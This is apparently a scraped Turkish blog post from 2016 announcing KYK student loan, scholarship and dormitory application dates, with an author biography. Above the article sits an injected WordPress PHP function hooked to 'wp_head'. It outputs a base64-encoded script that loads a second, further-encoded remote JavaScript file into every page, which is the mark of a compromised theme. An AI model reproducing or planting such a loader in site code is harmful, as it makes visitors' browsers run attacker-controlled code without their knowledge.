function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); KYK, Kredi ve Burs Başvuru Tarihleri Belli Oldu – Besyo Hakkında Güncel Bilgiler

KYK, Kredi ve Burs Başvuru Tarihleri Belli Oldu

23 Eylül 2016
Genel
6 2

KYK Genel Müdürü Syn Sinan Aksu  “Kredi, Burs ve Özel Yetenek Sınavıyla kazananların yurt başvuru tarihleri ne zaman?” sorusuna cevap verdi.
“Başvuruların hepsi Ekim’in ilk haftası yapılacak ve müracaatların tamamı e-devlet üzerinden yapılacak” dedi ve ekledi “Kasım ayı itibariyle de burs ve kredi sonuçlarını ileteceğiz.”
Ayrıca 1. sınıf öğrencilerinin burs ve kredileri ekim ayında başlayacak.
Özel yetenek sınavıyla KYK’ya başvuran adayların ise başvuruları Ekim’in ilk haftası olacakken sonuçlarınında Ekim’in 2. ya da 3. haftası açıklanması beklenmektedir.

BAŞVURULAR BAŞLADIĞI AN SİTEMİZDEN DUYURULACAKTIR. UYGULAMAMIZDAN BİLDİRİM GÖNDERİLECEKTİR.

0
http://www.instagram.com/alp.besyocuyuz

1993 yılında Bursa'da doğdum. Küçük yaşlarda spora merak salmaya başladım. Ailemin de desteğiyle çok küçük yaşlarda spora başladım. 2012 yılında Kastamonu Üniversitesi spor yöneticiliği bölümünü kazandım. Kastamonu'yu çeşitli sebeplerle bırakıp. 2015 yılında tekrar sınava girip Ankara Üniversitesi Antrenörlük bölümünü kazandım. 2017 Yılında Uludağ üniversitesine geçiş yaptım

Bir Cevap Yazın

Menü